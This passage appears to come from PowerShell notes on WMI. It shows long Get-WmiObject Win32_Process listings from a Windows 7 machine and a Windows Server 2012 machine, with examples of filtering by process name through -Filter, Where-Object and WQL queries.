2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3024\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3024\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k LocalServicePeerNet\nCreationClassName : Win32_Process\nCreationDate : 20170712123348.685360-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 3024\nHandleCount : 341\nInstallDate :\nKernelModeTime : 19327792\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 201161\nOtherTransferCount : 7589924\nPageFaults : 12646\nPageFileUsage : 8156\nParentProcessId : 488\nPeakPageFileUsage : 8188\nPeakVirtualSize : 76333056\nPeakWorkingSetSize : 9876\nPriority : 8\nPrivatePageCount : 8351744\nProcessId : 3024\nQuotaNonPagedPoolUsage : 13\nQuotaPagedPoolUsage : 57\nQuotaPeakNonPagedPoolUsage : 40\nQuotaPeakPagedPoolUsage : 58\nReadOperationCount : 73\nReadTransferCount : 1984308\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 7\nUserModeTime : 9413536\nVirtualSize : 69562368\nWindowsVersion : 6.1.7600\nWorkingSetSize : 9433088\nWriteOperationCount : 835\nWriteTransferCount : 1454446\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 341\nVM : 69562368\nWS : 9433088\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3236\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3236\"\nCaption : powershell.exe\nCommandLine : \"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123353.342056-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : powershell.exe\nExecutablePath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3236\nHandleCount : 519\nInstallDate :\nKernelModeTime : 3905616\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 4376\nOtherTransferCount : 46062\nPageFaults : 12085\nPageFileUsage : 24428\nParentProcessId : 980\nPeakPageFileUsage : 37584\nPeakVirtualSize : 195739648\nPeakWorkingSetSize : 38424\nPriority : 8\nPrivatePageCount : 25014272\nProcessId : 3236\nQuotaNonPagedPoolUsage : 12\nQuotaPagedPoolUsage : 148\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 148\nReadOperationCount : 267\nReadTransferCount : 972300\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 7811232\nVirtualSize : 184668160\nWindowsVersion : 6.1.7600\nWorkingSetSize : 37801984\nWriteOperationCount : 3\nWriteTransferCount : 6434\nPSComputerName : JOHN-PC\nProcessName : powershell.exe\nHandles : 519\nVM : 184668160\nWS : 37801984\nPath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3244\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3244\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712123353.452214-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 3244\nHandleCount : 39\nInstallDate :\nKernelModeTime : 8111664\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 172\nOtherTransferCount : 824\nPageFaults : 2443\nPageFileUsage : 3840\nParentProcessId : 404\nPeakPageFileUsage : 4984\nPeakVirtualSize : 47939584\nPeakWorkingSetSize : 7048\nPriority : 8\nPrivatePageCount : 3932160\nProcessId : 3244\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 46\nQuotaPeakNonPagedPoolUsage : 3\nQuotaPeakPagedPoolUsage : 47\nReadOperationCount : 22\nReadTransferCount : 11850\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 701008\nVirtualSize : 47136768\nWindowsVersion : 6.1.7600\nWorkingSetSize : 6479872\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : conhost.exe\nHandles : 39\nVM : 47136768\nWS : 6479872\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3444\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3444\"\nCaption : cmd.exe\nCommandLine : \"C:\\Windows\\system32\\cmd.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712124552.936782-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : cmd.exe\nExecutablePath : C:\\Windows\\system32\\cmd.exe\nExecutionState :\nHandle : 3444\nHandleCount : 23\nInstallDate :\nKernelModeTime : 200288\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : cmd.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 259\nOtherTransferCount : 1746\nPageFaults : 576\nPageFileUsage : 1760\nParentProcessId : 980\nPeakPageFileUsage : 1760\nPeakVirtualSize : 31256576\nPeakWorkingSetSize : 2168\nPriority : 8\nPrivatePageCount : 1802240\nProcessId : 3444\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 33\nQuotaPeakNonPagedPoolUsage : 6\nQuotaPeakPagedPoolUsage : 33\nReadOperationCount : 1\nReadTransferCount : 11742\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 0\nVirtualSize : 31256576\nWindowsVersion : 6.1.7600\nWorkingSetSize : 2097152\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : cmd.exe\nHandles : 23\nVM : 31256576\nWS : 2097152\nPath : C:\\Windows\\system32\\cmd.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3712\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3712\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712124552.946796-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 3712\nHandleCount : 36\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 170\nOtherTransferCount : 758\nPageFaults : 714\nPageFileUsage : 604\nParentProcessId : 404\nPeakPageFileUsage : 624\nPeakVirtualSize : 42553344\nPeakWorkingSetSize : 2696\nPriority : 8\nPrivatePageCount : 618496\nProcessId : 3712\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 37\nQuotaPeakNonPagedPoolUsage : 3\nQuotaPeakPagedPoolUsage : 45\nReadOperationCount : 15\nReadTransferCount : 12236\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 33808384\nWindowsVersion : 6.1.7600\nWorkingSetSize : 2752512\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : conhost.exe\nHandles : 36\nVM : 33808384\nWS : 2752512\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3524\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3524\"\nCaption : python.exe\nCommandLine : python -m SimpleHTTPServer\nCreationClassName : Win32_Process\nCreationDate : 20170712124602.320275-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : python.exe\nExecutablePath : C:\\Python27\\python.exe\nExecutionState :\nHandle : 3524\nHandleCount : 134\nInstallDate :\nKernelModeTime : 1201728\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : python.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 42258\nOtherTransferCount : 678289\nPageFaults : 2591\nPageFileUsage : 6324\nParentProcessId : 3444\nPeakPageFileUsage : 6384\nPeakVirtualSize : 72130560\nPeakWorkingSetSize : 9872\nPriority : 8\nPrivatePageCount : 6475776\nProcessId : 3524\nQuotaNonPagedPoolUsage : 6\nQuotaPagedPoolUsage : 56\nQuotaPeakNonPagedPoolUsage : 23\nQuotaPeakPagedPoolUsage : 56\nReadOperationCount : 204\nReadTransferCount : 907444\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 701008\nVirtualSize : 66035712\nWindowsVersion : 6.1.7600\nWorkingSetSize : 5103616\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : python.exe\nHandles : 134\nVM : 66035712\nWS : 5103616\nPath : C:\\Python27\\python.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3136\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3136\"\nCaption : powershell.exe\nCommandLine : \"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712130457.189342-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : powershell.exe\nExecutablePath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3136\nHandleCount : 384\nInstallDate :\nKernelModeTime : 1402016\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3210\nOtherTransferCount : 39824\nPageFaults : 10441\nPageFileUsage : 21412\nParentProcessId : 980\nPeakPageFileUsage : 35928\nPeakVirtualSize : 180490240\nPeakWorkingSetSize : 37160\nPriority : 8\nPrivatePageCount : 21925888\nProcessId : 3136\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 135\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 135\nReadOperationCount : 267\nReadTransferCount : 978070\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 3905616\nVirtualSize : 170201088\nWindowsVersion : 6.1.7600\nWorkingSetSize : 32100352\nWriteOperationCount : 3\nWriteTransferCount : 6434\nPSComputerName : JOHN-PC\nProcessName : powershell.exe\nHandles : 384\nVM : 170201088\nWS : 32100352\nPath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2960\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2960\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712130457.209371-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 2960\nHandleCount : 39\nInstallDate :\nKernelModeTime : 1201728\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 161\nOtherTransferCount : 648\nPageFaults : 1803\nPageFileUsage : 4224\nParentProcessId : 404\nPeakPageFileUsage : 4224\nPeakVirtualSize : 47144960\nPeakWorkingSetSize : 6612\nPriority : 8\nPrivatePageCount : 4325376\nProcessId : 2960\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 46\nQuotaPeakNonPagedPoolUsage : 3\nQuotaPeakPagedPoolUsage : 47\nReadOperationCount : 22\nReadTransferCount : 12622\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 300432\nVirtualSize : 47136768\nWindowsVersion : 6.1.7600\nWorkingSetSize : 6746112\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : conhost.exe\nHandles : 39\nVM : 47136768\nWS : 6746112\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3408\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3408\"\nCaption : notepad.exe\nCommandLine : \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\John\\Desktop\\log.txt\nCreationClassName : Win32_Process\nCreationDate : 20170712130654.798456-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : notepad.exe\nExecutablePath : C:\\Windows\\system32\\NOTEPAD.EXE\nExecutionState :\nHandle : 3408\nHandleCount : 56\nInstallDate :\nKernelModeTime : 600864\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : notepad.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 265\nOtherTransferCount : 1230\nPageFaults : 1104\nPageFileUsage : 1008\nParentProcessId : 980\nPeakPageFileUsage : 1008\nPeakVirtualSize : 57073664\nPeakWorkingSetSize : 4256\nPriority : 8\nPrivatePageCount : 1032192\nProcessId : 3408\nQuotaNonPagedPoolUsage : 4\nQuotaPagedPoolUsage : 58\nQuotaPeakNonPagedPoolUsage : 4\nQuotaPeakPagedPoolUsage : 58\nReadOperationCount : 2\nReadTransferCount : 19076\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 200288\nVirtualSize : 57016320\nWindowsVersion : 6.1.7600\nWorkingSetSize : 4304896\nWriteOperationCount : 1\nWriteTransferCount : 6205\nPSComputerName : JOHN-PC\nProcessName : notepad.exe\nHandles : 56\nVM : 57016320\nWS : 4304896\nPath : C:\\Windows\\system32\\NOTEPAD.EXE\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1604\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1604\"\nCaption : wuauclt.exe\nCommandLine : \"C:\\Windows\\system32\\wuauclt.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712171611.519551-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : wuauclt.exe\nExecutablePath : C:\\Windows\\system32\\wuauclt.exe\nExecutionState :\nHandle : 1604\nHandleCount : 87\nInstallDate :\nKernelModeTime : 200288\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wuauclt.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 581\nOtherTransferCount : 3230\nPageFaults : 1465\nPageFileUsage : 1116\nParentProcessId : 940\nPeakPageFileUsage : 1176\nPeakVirtualSize : 74887168\nPeakWorkingSetSize : 4552\nPriority : 8\nPrivatePageCount : 1142784\nProcessId : 1604\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 54\nQuotaPeakNonPagedPoolUsage : 6\nQuotaPeakPagedPoolUsage : 74\nReadOperationCount : 1\nReadTransferCount : 16278\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 3\nUserModeTime : 100144\nVirtualSize : 54349824\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3743744\nWriteOperationCount : 8\nWriteTransferCount : 862\nPSComputerName : JOHN-PC\nProcessName : wuauclt.exe\nHandles : 87\nVM : 54349824\nWS : 3743744\nPath : C:\\Windows\\system32\\wuauclt.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2356\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2356\"\nCaption : WmiPrvSE.exe\nCommandLine : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712181550.475665-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : WmiPrvSE.exe\nExecutablePath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nExecutionState :\nHandle : 2356\nHandleCount : 115\nInstallDate :\nKernelModeTime : 100144\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : WmiPrvSE.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 423\nOtherTransferCount : 1538\nPageFaults : 1238\nPageFileUsage : 1820\nParentProcessId : 608\nPeakPageFileUsage : 1820\nPeakVirtualSize : 26275840\nPeakWorkingSetSize : 4460\nPriority : 8\nPrivatePageCount : 1863680\nProcessId : 2356\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 26\nQuotaPeakNonPagedPoolUsage : 5\nQuotaPeakPagedPoolUsage : 26\nReadOperationCount : 1\nReadTransferCount : 37802\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 7\nUserModeTime : 200288\nVirtualSize : 26275840\nWindowsVersion : 6.1.7600\nWorkingSetSize : 4567040\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : WmiPrvSE.exe\nHandles : 115\nVM : 26275840\nWS : 4567040\nPath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Get-WmiObject``` - ```Filter```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name = \"powershell.exe\"}\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3416\"\nCaption : powershell.exe\nCommandLine : \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3416\nHandleCount : 523\nInstallDate :\nKernelModeTime : 26718750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 144949\nOtherTransferCount : 7251556\nPageFaults : 300851\nPageFileUsage : 110900\nParentProcessId : 1188\nPeakPageFileUsage : 114860\nPeakVirtualSize : 736120832\nPeakWorkingSetSize : 123328\nPriority : 8\nPrivatePageCount : 113561600\nProcessId : 3416\nQuotaNonPagedPoolUsage : 40\nQuotaPagedPoolUsage : 577\nQuotaPeakNonPagedPoolUsage : 46\nQuotaPeakPagedPoolUsage : 578\nReadOperationCount : 1110\nReadTransferCount : 3557444\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 12\nUserModeTime : 176250000\nVirtualSize : 733343744\nWindowsVersion : 6.3.9600\nWorkingSetSize : 124723200\nWriteOperationCount : 80\nWriteTransferCount : 18596\nPSComputerName : WIN-2012-DC\nProcessName : powershell.exe\nHandles : 523\nVM : 733343744\nWS : 124723200\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Get-WmiObject``` - ```Where-Object```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -eq \"powershell.exe\"}\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3416\"\nCaption : powershell.exe\nCommandLine : \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3416\nHandleCount : 564\nInstallDate :\nKernelModeTime : 26718750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 146742\nOtherTransferCount : 7521736\nPageFaults : 301103\nPageFileUsage : 110920\nParentProcessId : 1188\nPeakPageFileUsage : 114860\nPeakVirtualSize : 736120832\nPeakWorkingSetSize : 123328\nPriority : 8\nPrivatePageCount : 113582080\nProcessId : 3416\nQuotaNonPagedPoolUsage : 40\nQuotaPagedPoolUsage : 577\nQuotaPeakNonPagedPoolUsage : 46\nQuotaPeakPagedPoolUsage : 578\nReadOperationCount : 1110\nReadTransferCount : 3557444\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 12\nUserModeTime : 176875000\nVirtualSize : 734392320\nWindowsVersion : 6.3.9600\nWorkingSetSize : 124850176\nWriteOperationCount : 80\nWriteTransferCount : 18596\nPSComputerName : WIN-2012-DC\nProcessName : powershell.exe\nHandles : 564\nVM : 734392320\nWS : 124850176\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Get-WmiObject``` - ```Query ```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Query {Select * from Win32_Process where Name=\"powershell.exe\"}\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3416\"\nCaption : powershell.exe\nCommandLine : \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3416\nHandleCount : 546\nInstallDate :\nKernelModeTime : 27187500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 149572\nOtherTransferCount : 8065898\nPageFaults : 301349\nPageFileUsage : 111084\nParentProcessId : 1188\nPeakPageFileUsage : 114860\nPeakVirtualSize : 736120832\nPeakWorkingSetSize : 123328\nPriority : 8\nPrivatePageCount : 113750016\nProcessId : 3416\nQuotaNonPagedPoolUsage : 39\nQuotaPagedPoolUsage : 577\nQuotaPeakNonPagedPoolUsage : 46\nQuotaPeakPagedPoolUsage : 578\nReadOperationCount : 1110\nReadTransferCount : 3557444\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 177656250\nVirtualSize : 733859840\nWindowsVersion : 6.3.9600\nWorkingSetSize : 125005824\nWriteOperationCount : 80\nWriteTransferCount : 18596\nPSComputerName : WIN-2012-DC\nProcessName : powershell.exe\nHandles : 546\nVM : 733859840\nWS : 125005824\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Query {Select * from Win32_Process where Name=\"notepad.exe\"}\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"956\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"956\"\nCaption : 